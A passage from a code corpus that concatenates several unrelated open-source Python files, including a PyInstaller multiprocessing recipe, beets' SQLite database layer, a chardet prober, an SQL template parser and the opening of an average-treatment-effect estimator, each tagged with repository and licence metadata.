https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
"""
import multiprocessing.forking as forking
import os
import sys
class _Popen(multiprocessing.forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
#class Process(multiprocessing.Process):
#_Popen = _Popen
# ...
if __name__ == '__main__':
# On Windows calling this function is necessary.
multiprocessing.freeze_support()
| apache-2.0 |
AndrewSmart/audacity | lib-src/lv2/lv2/plugins/eg01-amp.lv2/waflib/fixpy2.py | 332 | 1110 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os
all_modifs={}
def fixdir(dir):
global all_modifs
for k in all_modifs:
for v in all_modifs[k]:
modif(os.path.join(dir,'waflib'),k,v)
def modif(dir,name,fun):
if name=='*':
lst=[]
for y in'. Tools extras'.split():
for x in os.listdir(os.path.join(dir,y)):
if x.endswith('.py'):
lst.append(y+os.sep+x)
for x in lst:
modif(dir,x,fun)
return
filename=os.path.join(dir,name)
f=open(filename,'r')
try:
txt=f.read()
finally:
f.close()
txt=fun(txt)
f=open(filename,'w')
try:
f.write(txt)
finally:
f.close()
def subst(*k):
def do_subst(fun):
global all_modifs
for x in k:
try:
all_modifs[x].append(fun)
except KeyError:
all_modifs[x]=[fun]
return fun
return do_subst
@subst('*')
def r1(code):
code=code.replace(',e:',',e:')
code=code.replace("",'')
code=code.replace('','')
return code
@subst('Runner.py')
def r4(code):
code=code.replace('next(self.biter)','self.biter.next()')
return code
| gpl-2.0 |
DxCx/nzbToMedia | libs/beets/dbcore/db.py | 9 | 24566 | # This file is part of beets.
# Copyright 2014, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""The central Model and Database constructs for DBCore.
"""
import time
import os
from collections import defaultdict
import threading
import sqlite3
import contextlib
import beets
from beets.util.functemplate import Template
from .query import MatchQuery
# Abstract base for model classes.
class Model(object):
"""An abstract object representing an object in the database. Model
objects act like dictionaries (i.e., the allow subscript access like
``obj['field']``). The same field set is available via attribute
access as a shortcut (i.e., ``obj.field``). Three kinds of attributes are
available:
* **Fixed attributes** come from a predetermined list of field
names. These fields correspond to SQLite table columns and are
thus fast to read, write, and query.
* **Flexible attributes** are free-form and do not need to be listed
ahead of time.
* **Computed attributes** are read-only fields computed by a getter
function provided by a plugin.
Access to all three field types is uniform: ``obj.field`` works the
same regardless of whether ``field`` is fixed, flexible, or
computed.
Model objects can optionally be associated with a `Library` object,
in which case they can be loaded and stored from the database. Dirty
flags are used to track which fields need to be stored.
"""
# Abstract components (to be provided by subclasses).
_table = None
"""The main SQLite table name.
"""
_flex_table = None
"""The flex field SQLite table name.
"""
_fields = {}
"""A mapping indicating available "fixed" fields on this type. The
keys are field names and the values are Type objects.
"""
_bytes_keys = ()
"""Keys whose values should be stored as raw bytes blobs rather than
strings.
"""
_search_fields = ()
"""The fields that should be queried by default by unqualified query
terms.
"""
@classmethod
def _getters(cls):
"""Return a mapping from field names to getter functions.
"""
# We could cache this if it becomes a performance problem to
# gather the getter mapping every time.
raise NotImplementedError()
def _template_funcs(self):
"""Return a mapping from function names to text-transformer
functions.
"""
# As above: we could consider caching this result.
raise NotImplementedError()
# Basic operation.
def __init__(self, db=None, **values):
"""Create a new object with an optional Database association and
initial field values.
"""
self._db = db
self._dirty = set()
self._values_fixed = {}
self._values_flex = {}
# Initial contents.
self.update(values)
self.clear_dirty()
def __repr__(self):
return '{0}({1})'.format(
type(self).__name__,
', '.join('{0}={1!r}'.format(k, v) for k, v in dict(self).items()),
)
def clear_dirty(self):
"""Mark all fields as *clean* (i.e., not needing to be stored to
the database).
"""
self._dirty = set()
def _check_db(self, need_id=True):
"""Ensure that this object is associated with a database row: it
has a reference to a database (`_db`) and an id. A ValueError
exception is raised otherwise.
"""
if not self._db:
raise ValueError('{0} has no database'.format(type(self).__name__))
if need_id and not self.id:
raise ValueError('{0} has no id'.format(type(self).__name__))
# Essential field accessors.
def __getitem__(self, key):
"""Get the value for a field. Raise a KeyError if the field is
not available.
"""
getters = self._getters()
if key in getters: # Computed.
return getters[key](self)
elif key in self._fields: # Fixed.
return self._values_fixed.get(key)
elif key in self._values_flex: # Flexible.
return self._values_flex[key]
else:
raise KeyError(key)
def __setitem__(self, key, value):
"""Assign the value for a field.
"""
source = self._values_fixed if key in self._fields \
else self._values_flex
old_value = source.get(key)
source[key] = value
if old_value != value:
self._dirty.add(key)
def __delitem__(self, key):
"""Remove a flexible attribute from the model.
"""
if key in self._values_flex: # Flexible.
del self._values_flex[key]
self._dirty.add(key) # Mark for dropping on store.
elif key in self._getters(): # Computed.
raise KeyError('computed field {0} cannot be deleted'.format(key))
elif key in self._fields: # Fixed.
raise KeyError('fixed field {0} cannot be deleted'.format(key))
else:
raise KeyError('no such field {0}'.format(key))
def keys(self, computed=False):
"""Get a list of available field names for this object. The
`computed` parameter controls whether computed (plugin-provided)
fields are included in the key list.
"""
base_keys = list(self._fields) + self._values_flex.keys()
if computed:
return base_keys + self._getters().keys()
else:
return base_keys
# Act like a dictionary.
def update(self, values):
"""Assign all values in the given dict.
"""
for key, value in values.items():
self[key] = value
def items(self):
"""Iterate over (key, value) pairs that this object contains.
Computed fields are not included.
"""
for key in self:
yield key, self[key]
def get(self, key, default=None):
"""Get the value for a given key or `default` if it does not
exist.
"""
if key in self:
return self[key]
else:
return default
def __contains__(self, key):
"""Determine whether `key` is an attribute on this object.
"""
return key in self.keys(True)
def __iter__(self):
"""Iterate over the available field names (excluding computed
fields).
"""
return iter(self.keys())
# Convenient attribute access.
def __getattr__(self, key):
if key.startswith('_'):
raise AttributeError('model has no attribute {0!r}'.format(key))
else:
try:
return self[key]
except KeyError:
raise AttributeError('no such field {0!r}'.format(key))
def __setattr__(self, key, value):
if key.startswith('_'):
super(Model, self).__setattr__(key, value)
else:
self[key] = value
def __delattr__(self, key):
if key.startswith('_'):
super(Model, self).__delattr__(key)
else:
del self[key]
# Database interaction (CRUD methods).
def store(self):
"""Save the object's metadata into the library database.
"""
self._check_db()
# Build assignments for query.
assignments = ''
subvars = []
for key in self._fields:
if key != 'id' and key in self._dirty:
self._dirty.remove(key)
assignments += key + '=?,'
value = self[key]
# Wrap path strings in buffers so they get stored
# "in the raw".
if key in self._bytes_keys and isinstance(value, str):
value = buffer(value)
subvars.append(value)
assignments = assignments[:-1] # Knock off last ,
with self._db.transaction() as tx:
# Main table update.
if assignments:
query = 'UPDATE {0} SET {1} WHERE id=?'.format(
self._table, assignments
)
subvars.append(self.id)
tx.mutate(query, subvars)
# Modified/added flexible attributes.
for key, value in self._values_flex.items():
if key in self._dirty:
self._dirty.remove(key)
tx.mutate(
'INSERT INTO {0} '
'(entity_id, key, value) '
'VALUES (?, ?, ?);'.format(self._flex_table),
(self.id, key, value),
)
# Deleted flexible attributes.
for key in self._dirty:
tx.mutate(
'DELETE FROM {0} '
'WHERE entity_id=? AND key=?'.format(self._flex_table),
(self.id, key)
)
self.clear_dirty()
def load(self):
"""Refresh the object's metadata from the library database.
"""
self._check_db()
stored_obj = self._db._get(type(self), self.id)
assert stored_obj is not None, "object {0} not in DB".format(self.id)
self.update(dict(stored_obj))
self.clear_dirty()
def remove(self):
"""Remove the object's associated rows from the database.
"""
self._check_db()
with self._db.transaction() as tx:
tx.mutate(
'DELETE FROM {0} WHERE id=?'.format(self._table),
(self.id,)
)
tx.mutate(
'DELETE FROM {0} WHERE entity_id=?'.format(self._flex_table),
(self.id,)
)
def add(self, db=None):
"""Add the object to the library database. This object must be
associated with a database; you can provide one via the `db`
parameter or use the currently associated database.
The object's `id` and `added` fields are set along with any
current field values.
"""
if db:
self._db = db
self._check_db(False)
with self._db.transaction() as tx:
new_id = tx.mutate(
'INSERT INTO {0} DEFAULT VALUES'.format(self._table)
)
self.id = new_id
self.added = time.time()
# Mark every non-null field as dirty and store.
for key in self:
if self[key] is not None:
self._dirty.add(key)
self.store()
# Formatting and templating.
@classmethod
def _format(cls, key, value, for_path=False):
"""Format a value as the given field for this model.
"""
# Format the value as a string according to its type, if any.
if key in cls._fields:
value = cls._fields[key].format(value)
# Formatting must result in a string. To deal with
# Python2isms, implicitly convert ASCII strings.
assert isinstance(value, basestring), \
u'field formatter must produce strings'
if isinstance(value, bytes):
value = value.decode('utf8', 'ignore')
elif not isinstance(value, unicode):
# Fallback formatter. Convert to unicode at all cost.
if value is None:
value = u''
elif isinstance(value, basestring):
if isinstance(value, bytes):
value = value.decode('utf8', 'ignore')
else:
value = unicode(value)
if for_path:
sep_repl = beets.config['path_sep_replace'].get(unicode)
for sep in (os.path.sep, os.path.altsep):
if sep:
value = value.replace(sep, sep_repl)
return value
def _get_formatted(self, key, for_path=False):
"""Get a field value formatted as a string (`unicode` object)
for display to the user. If `for_path` is true, then the value
will be sanitized for inclusion in a pathname (i.e., path
separators will be removed from the value).
"""
return self._format(key, self.get(key), for_path)
def _formatted_mapping(self, for_path=False):
"""Get a mapping containing all values on this object formatted
as human-readable strings.
"""
# In the future, this could be made "lazy" to avoid computing
# fields unnecessarily.
out = {}
for key in self.keys(True):
out[key] = self._get_formatted(key, for_path)
return out
def evaluate_template(self, template, for_path=False):
"""Evaluate a template (a string or a `Template` object) using
the object's fields. If `for_path` is true, then no new path
separators will be added to the template.
"""
# Build value mapping.
mapping = self._formatted_mapping(for_path)
# Get template functions.
funcs = self._template_funcs()
# Perform substitution.
if isinstance(template, basestring):
template = Template(template)
return template.substitute(mapping, funcs)
# Parsing.
@classmethod
def _parse(cls, key, string):
"""Parse a string as a value for the given key.
"""
if not isinstance(string, basestring):
raise TypeError("_parse() argument must be a string")
typ = cls._fields.get(key)
if typ:
return typ.parse(string)
else:
# Fall back to unparsed string.
return string
# Database controller and supporting interfaces.
class Results(object):
"""An item query result set. Iterating over the collection lazily
constructs LibModel objects that reflect database rows.
"""
def __init__(self, model_class, rows, db, query=None):
"""Create a result set that will construct objects of type
`model_class`, which should be a subclass of `LibModel`, out of
the query result mapping in `rows`. The new objects are
associated with the database `db`. If `query` is provided, it is
used as a predicate to filter the results for a "slow query" that
cannot be evaluated by the database directly.
"""
self.model_class = model_class
self.rows = rows
self.db = db
self.query = query
def __iter__(self):
"""Construct Python objects for all rows that pass the query
predicate.
"""
for row in self.rows:
# Get the flexible attributes for the object.
with self.db.transaction() as tx:
flex_rows = tx.query(
'SELECT * FROM {0} WHERE entity_id=?'.format(
self.model_class._flex_table
),
(row['id'],)
)
values = dict(row)
values.update(
dict((row['key'], row['value']) for row in flex_rows)
)
# Construct the Python object and yield it if it passes the
# predicate.
obj = self.model_class(self.db, **values)
if not self.query or self.query.match(obj):
yield obj
def __len__(self):
"""Get the number of matching objects.
"""
if self.query:
# A slow query. Fall back to testing every object.
count = 0
for obj in self:
count += 1
return count
else:
# A fast query. Just count the rows.
return len(self.rows)
def __nonzero__(self):
"""Does this result contain any objects?
"""
return bool(len(self))
def __getitem__(self, n):
"""Get the nth item in this result set. This is inefficient: all
items up to n are materialized and thrown away.
"""
it = iter(self)
try:
for i in range(n):
it.next()
return it.next()
except StopIteration:
raise IndexError('result index {0} out of range'.format(n))
def get(self):
"""Return the first matching object, or None if no objects
match.
"""
it = iter(self)
try:
return it.next()
except StopIteration:
return None
class Transaction(object):
"""A context manager for safe, concurrent access to the database.
All SQL commands should be executed through a transaction.
"""
def __init__(self, db):
self.db = db
def __enter__(self):
"""Begin a transaction. This transaction may be created while
another is active in a different thread.
"""
with self.db._tx_stack() as stack:
first = not stack
stack.append(self)
if first:
# Beginning a "root" transaction, which corresponds to an
# SQLite transaction.
self.db._db_lock.acquire()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Complete a transaction. This must be the most recently
entered but not yet exited transaction. If it is the last active
transaction, the database updates are committed.
"""
with self.db._tx_stack() as stack:
assert stack.pop() is self
empty = not stack
if empty:
# Ending a "root" transaction. End the SQLite transaction.
self.db._connection().commit()
self.db._db_lock.release()
def query(self, statement, subvals=()):
"""Execute an SQL statement with substitution values and return
a list of rows from the database.
"""
cursor = self.db._connection().execute(statement, subvals)
return cursor.fetchall()
def mutate(self, statement, subvals=()):
"""Execute an SQL statement with substitution values and return
the row ID of the last affected row.
"""
cursor = self.db._connection().execute(statement, subvals)
return cursor.lastrowid
def script(self, statements):
"""Execute a string containing multiple SQL statements."""
self.db._connection().executescript(statements)
class Database(object):
"""A container for Model objects that wraps an SQLite database as
the backend.
"""
_models = ()
"""The Model subclasses representing tables in this database.
"""
def __init__(self, path):
self.path = path
self._connections = {}
self._tx_stacks = defaultdict(list)
# A lock to protect the _connections and _tx_stacks maps, which
# both map thread IDs to private resources.
self._shared_map_lock = threading.Lock()
# A lock to protect access to the database itself. SQLite does
# allow multiple threads to access the database at the same
# time, but many users were experiencing crashes related to this
# capability: where SQLite was compiled without HAVE_USLEEP, its
# backoff algorithm in the case of contention was causing
# whole-second sleeps (!) that would trigger its internal
# timeout. Using this lock ensures only one SQLite transaction
# is active at a time.
self._db_lock = threading.Lock()
# Set up database schema.
for model_cls in self._models:
self._make_table(model_cls._table, model_cls._fields)
self._make_attribute_table(model_cls._flex_table)
# Primitive access control: connections and transactions.
def _connection(self):
"""Get a SQLite connection object to the underlying database.
One connection object is created per thread.
"""
thread_id = threading.current_thread().ident
with self._shared_map_lock:
if thread_id in self._connections:
return self._connections[thread_id]
else:
# Make a new connection.
conn = sqlite3.connect(
self.path,
timeout=beets.config['timeout'].as_number(),
)
# Access SELECT results like dictionaries.
conn.row_factory = sqlite3.Row
self._connections[thread_id] = conn
return conn
@contextlib.contextmanager
def _tx_stack(self):
"""A context manager providing access to the current thread's
transaction stack. The context manager synchronizes access to
the stack map. Transactions should never migrate across threads.
"""
thread_id = threading.current_thread().ident
with self._shared_map_lock:
yield self._tx_stacks[thread_id]
def transaction(self):
"""Get a :class:`Transaction` object for interacting directly
with the underlying SQLite database.
"""
return Transaction(self)
# Schema setup and migration.
def _make_table(self, table, fields):
"""Set up the schema of the database. `fields` is a mapping
from field names to `Type`s. Columns are added if necessary.
"""
# Get current schema.
with self.transaction() as tx:
rows = tx.query('PRAGMA table_info(%s)' % table)
current_fields = set([row[1] for row in rows])
field_names = set(fields.keys())
if current_fields.issuperset(field_names):
# Table exists and has all the required columns.
return
if not current_fields:
# No table exists.
columns = []
for name, typ in fields.items():
columns.append('{0} {1}'.format(name, typ.sql))
setup_sql = 'CREATE TABLE {0} ({1});\n'.format(table,
', '.join(columns))
else:
# Table exists does not match the field set.
setup_sql = ''
for name, typ in fields.items():
if name in current_fields:
continue
setup_sql += 'ALTER TABLE {0} ADD COLUMN {1} {2};\n'.format(
table, name, typ.sql
)
with self.transaction() as tx:
tx.script(setup_sql)
def _make_attribute_table(self, flex_table):
"""Create a table and associated index for flexible attributes
for the given entity (if they don't exist).
"""
with self.transaction() as tx:
tx.script("""
CREATE TABLE IF NOT EXISTS {0} (
id INTEGER PRIMARY KEY,
entity_id INTEGER,
key TEXT,
value TEXT,
UNIQUE(entity_id, key) ON CONFLICT REPLACE);
CREATE INDEX IF NOT EXISTS {0}_by_entity
ON {0} (entity_id);
""".format(flex_table))
# Querying.
def _fetch(self, model_cls, query, order_by=None):
"""Fetch the objects of type `model_cls` matching the given
query. The query may be given as a string, string sequence, a
Query object, or None (to fetch everything). If provided,
`order_by` is a SQLite ORDER BY clause for sorting.
"""
where, subvals = query.clause()
sql = "SELECT * FROM {0} WHERE {1}".format(
model_cls._table,
where or '1',
)
if order_by:
sql += " ORDER BY {0}".format(order_by)
with self.transaction() as tx:
rows = tx.query(sql, subvals)
return Results(model_cls, rows, self, None if where else query)
def _get(self, model_cls, id):
"""Get a Model object by its id or None if the id does not
exist.
"""
return self._fetch(model_cls, MatchQuery('id', id)).get()
| gpl-3.0 |
xingniu/nlp-util | sequence-diff.py | 1 | 5138 | #!/usr/bin/env python -*- coding: utf-8 -*-
import argparse
import utils
from difflib import ndiff
MODE_CHAR = "char"
MODE_TOKEN = "token"
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--file', required=True, nargs='+',
help='input files of sequences to be compared (the first file is the base to be compared with, \
such as reference translations)')
parser.add_argument('-c', '--const', required=False, nargs='+', default=[],
help='files of sequences not participating in the comparison, \
such as source sentences to be translated')
parser.add_argument('-ft', '--file-tag', required=False, nargs='+', help='tags of input files')
parser.add_argument('-ct', '--const-tag', required=False, nargs='+', help='tags of const files')
parser.add_argument('-d', '--condense', required=False, action="store_true",
help='condense the comparison of multiple sequences without showing diffs')
parser.add_argument('-m', '--mode', choices=[MODE_CHAR, MODE_TOKEN], default=MODE_CHAR,
help='compute diffs at character level or token level')
parser.add_argument('-v', '--verbose', required=False, action="store_true",
help='print all sequences in the condense mode')
args = parser.parse_args()
if len(args.file) < 2:
utils.error("At least two files should be provided for comparison.")
tags = []
if args.const_tag is not None:
if len(args.const) != len(args.const_tag):
utils.error("The number of const files and tags should be the same.")
else:
tags = args.const_tag
else:
for i in range(len(args.const)):
tags.append("CONST-%d" % (i+1))
if args.file_tag is not None:
if len(args.file) != len(args.file_tag):
utils.error("The number of input files and tags should be the same.")
else:
tags += args.file_tag
else:
tags.append("SEQUE-B")
for i in range(1, len(args.file)):
tags.append("SEQUE-%d" % (i+1))
max_tag_len = max(len(t) for t in tags)
diff_counter = 0
files = [open(f) for f in args.const+args.file]
ref_index = len(args.const)
for counter, lines in enumerate(zip(*files), start=1):
lines = list(lines)
seq_set = set()
for i in range(ref_index, len(files)):
lines[i] = lines[i].strip()
seq_set.add(lines[i])
if len(seq_set) > 1 or args.verbose:
for i in range(ref_index):
print("%d %s\t%s" % (counter, tags[i], lines[i].strip()))
print("." * 100)
if args.verbose or len(seq_set) > 1 and args.condense:
print("%d %s\t%s" % (counter, tags[ref_index], lines[ref_index]))
found_first_diff = False
for i in range(ref_index+1, len(files)):
has_diff = lines[ref_index] != lines[i]
if args.verbose or has_diff and args.condense:
print("%d %s\t%s" % (counter, tags[i], lines[i]))
if has_diff and not args.verbose and not args.condense:
if found_first_diff:
print("." * 100)
if args.mode == MODE_CHAR:
diff_spaces = " " * (len(str(counter)) + max_tag_len + 1)
for dl in ndiff([lines[ref_index]], [lines[i]]):
if dl[0] == '-':
print("%d %s\t%s" % (counter, tags[ref_index], dl.strip()[2:]))
elif dl[0] == '+':
print("%d %s\t%s" % (counter, tags[i], dl.strip()[2:]))
else:
print("%s\t%s" % (diff_spaces, dl.strip()[2:]))
elif args.mode == MODE_TOKEN:
print("%d %s\t%s" % (counter, tags[ref_index], lines[ref_index]))
print("%d %s\t%s" % (counter, tags[i], lines[i]))
edits = []
last_dl = " "
for dl in ndiff(lines[ref_index].split(), lines[i].split()):
if dl[0] == '-' and last_dl[0] == '+':
edits.append("%s -> %s" % (dl[2:], last_dl[2:]))
last_dl = " "
elif dl[0] == '+' and last_dl[0] == '-':
edits.append("%s -> %s" % (last_dl[2:], dl[2:]))
last_dl = " "
elif dl[0] != '?':
if last_dl[0] == '+' or last_dl[0] == '-':
edits.append(last_dl)
last_dl = dl
print(edits)
found_first_diff = True
if len(seq_set) > 1 or args.verbose:
print("=" * 100)
if len(seq_set) > 1:
diff_counter += 1
print("%d lines read and %d diffs found" % (counter, diff_counter))
| mit |
alsotoes/vsphere-examples | python/.venv/lib/python2.6/site-packages/requests/packages/chardet/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
POSITIVE_SHORTCUT_THRESHOLD = 0.95
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
SYMBOL_CAT_ORDER = 250
NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
return self._mNameProber.get_charset_name()
else:
return self._mModel['charsetName']
def feed(self, aBuf):
if not self._mModel['keepEnglishLetter']:
aBuf = self.filter_without_english_letters(aBuf)
aLen = len(aBuf)
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
self._mFreqChar += 1
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, we have a'
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, below negative'
'shortcut threshhold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
def get_confidence(self):
r = 0.01
if self._mTotalSeqs > 0:
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99
return r
| gpl-3.0 |
amvtek/SqlMake | sqlmake/fileparser.py | 1 | 3515 | # -*- coding: utf-8 -*-
"""
fileparser
~~~~~~~~~~
parse SQL file making use of special comments
that defines dependencies & variables...
:copyright: (c) 2014 by sc AmvTek srl
:email: devel@amvtek.com
"""
import re
from os.path import abspath
from jinja2 import Environment # see PyPI jinja2
class ContentParser(object):
"Allows to parse resource out of file content"
_lineTokenSep = ','
_extractDEPS = re.compile(r"^--#\s*DEPS\s*:(.*)$", re.MULTILINE)
_isDEPSLine = re.compile(r"^--#\s*DEPS\s*:.*$", re.MULTILINE)
_extractVARS = re.compile(r"^--#\s*VARS\s*:(.*)$", re.MULTILINE)
_isVARSLine = re.compile(r"^--#\s*VARS\s*:.*$", re.MULTILINE)
_extractVarDef = re.compile(r"^\s*(\w+)(?:\=\s*(\w+)){0,1}$")
def split_token(self, contentline):
"return list of token"
return [tok.strip() for tok in contentline.split(self._lineTokenSep)]
def list_dependencies(self, content):
"return list of dependencies found on content DEPS lines"
# local alias
split = self.split_token
rv = []
for data in self._extractDEPS.findall(content):
rv.extend([s for s in split(data) if s])
return rv
def cleanup_deps_and_vars(self, content):
"remove DEPS and VARS lines from content"
rv = self._isDEPSLine.sub('',content)
rv = self._isVARSLine.sub('',rv)
return rv.strip()
def list_variables(self, content):
"return list of variables definition found on content VARS lines"
# local alias
split = self.split_token
rv = []
for data in self._extractVARS.findall(content):
rv.extend([s for s in split(data) if s])
return rv
def compile_template(self, content):
"return template string and default context..."
# extract variable definitions from content
vardefs = self.list_variables(content)
defaultCtx = {}
tplString = self.cleanup_deps_and_vars(content)
for vardef in vardefs:
m = self._extractVarDef.match(vardef)
if m is None:
raise ValueError("Invalid VARS token : %s"%vardef)
tok, repl = m.groups()
# set repl
if repl is None:
repl = tok
defaultCtx[repl] = tok
repl = "{{%s}}"%repl
# set tokPattern
tokPattern = r"\b%s\b" % tok # RMQ: always use r".." format
# replace in content
tplString = re.sub(tokPattern, repl, tplString)
return tplString, defaultCtx
def __call__(self, content):
"parse content and return dependencies, defaults, tplstring..."
dependencies = self.list_dependencies(content)
tplstring, defaults = self.compile_template(content)
return (dependencies, tplstring, defaults)
def render_resource(fpath, parser=None, **kwargs):
"render a single file resource"
# extract content
with open(abspath(fpath)) as f:
content = f.read()
# prepare parser
parse = parser or ContentParser()
if not callable(parse):
raise ValueError("Invalid parser !")
# compile resource template
tplEnv = Environment(line_statement_prefix='--#')
deps, tplstr, defaults = parse(content)
tpl = tplEnv.from_string(tplstr)
# prepare rendering context
ctx = dict(defaults)
ctx.update(kwargs)
return tpl.render(ctx)
| mit |
bryangraham/ipt | ipt/att.py | 1 | 39159 | # Load library dependencies
import numpy as np
import numpy.linalg
import scipy as sp
import scipy.optimize
import scipy.stats
import pandas as pd
# Import logit() command in ipt module since att() calls it
from .logit import logit
# Define att() function
#-----------------------------------------------------------------------------#
def att(D, Y, r_W, t_W, study_tilt=True, rlgrz=1, s_wgt=None, nocons=False, c_id=None, silent=False):
"""
AUTHOR: Bryan S. Graham, UC - Berkeley, bgraham@econ.berkeley.edu
DATE: Python 2.7 code on 26 May 2016, updated for Python 3.6 on 15 July 2018
This function estimates the average treatment effect on the treated (ATT)
using the "auxiliary-to-study tilting" (AST) method described by
Graham, Pinto and Egel (2016, Journal of Business and Economic Statistics).
The notation below mirrors that in the paper where possible. The Supplemental
Web Appendix of the paper describes the estimation algorithm implemented here
in detail. A copy of the paper and all supplemental appendices can be found
online at http://bryangraham.github.io/econometrics/
INPUTS
------
D : N x 1 pandas.Series with ith element equal to 1 if ith unit in the merged
sample is from the study population and zero if from the auxiliary
population (i.e., D is the "treatment" indicator)
Y : N x 1 pandas.Series of observed outcomes
r_W : r(W), N x 1+L pandas.DataFrame of functions of always observed covariates
-- these are the propensity score basis functions
t_W : t(W), N x 1+M pandas.DataFrame of functions of always observed covariates
-- these are the balancing functions
study_tilt: If True compute the study sample tilt. This should be set to False
if all the elements in t(W) are also contained in h(W). In that
case the study_tilt coincides with its empirical measure.This
measure is returned in the pi_s vector when study_tilt = False.
rlgrz : Regularization parameter. Should positive and less than or equal
to one. Smaller values correspond to less regularizations, but
may cause underflow problems when overlap is poor. The default
value will be adequate for most applications.
s_wgt : N x 1 pandas.Series of sampling weights variable (optional)
nocons : If True, then do NOT add constant to h_W and t_W matrix
(only set to True if user passes in dataframes with constants included)
c_id : N X 1 pandas.Series of unique `cluster' id values (assumed to be integer valued) (optional)
NOTE: Default is to assume independent observations and report heteroscedastic robust
standard errors
NOTE: Data are assumed to be pre-sorted by groups.
silent : if silent = True display less optimization information and use
lower tolerance levels (optional)
OUTPUTS
-------
gamma_ast : AST estimate of gamma (the ATT)
vcov_gamma_ast : estimated large sample variance of gamma
pscore_tests : list of [study_test, auxiliary_test] where
study_test : ChiSq test statistic of H0 : lambda_s = 0; list with
[statistic, dof, p-val]
NOTE: returns [None, None, None] if study_tilt = False
auxiliary_test : ChiSq test statistic of H0 : lambda_a = 0; list with
[statistic, dof, p-val]
tilts : numpy array with pi_eff, pi_s & pi_a as columns, sorted according
to the input data, and where
pi_eff : Semiparametrically efficient estimate of F_s(W)
pi_s : Study sample tilt
pi_a : Auxiliary sample tilt
exitflag : 1 = success, 2 = can't compute MLE of p-score, 3 = can't compute study/treated tilt,
4 = can't compute auxiliary/control tilt
FUNCTIONS CALLED : logit() (...logit_logl(), logit_score(), logit_hess()...)
---------------- ast_crit(), ast_foc(), ast_soc() (...ast_phi()...)
"""
def ast_phi(lmbda, t_W, p_W_index, NQ, rlgrz):
"""
This function evaluates the regularized phi(v) function for
the logit propensity score case (as well as its first and
second derivatives) as described in the Supplemental
Web Appendix of Graham, Pinto and Egel (2016, JBES).
INPUTS
------
lmbda : vector of tilting parameters
t_W : vector of balancing moments
p_W_index : index of estimated logit propensity score
NQ : sample size times the marginal probability of missingness
rlgrz : Regularization parameter. See discussion in main header.
OUTPUTS
-------
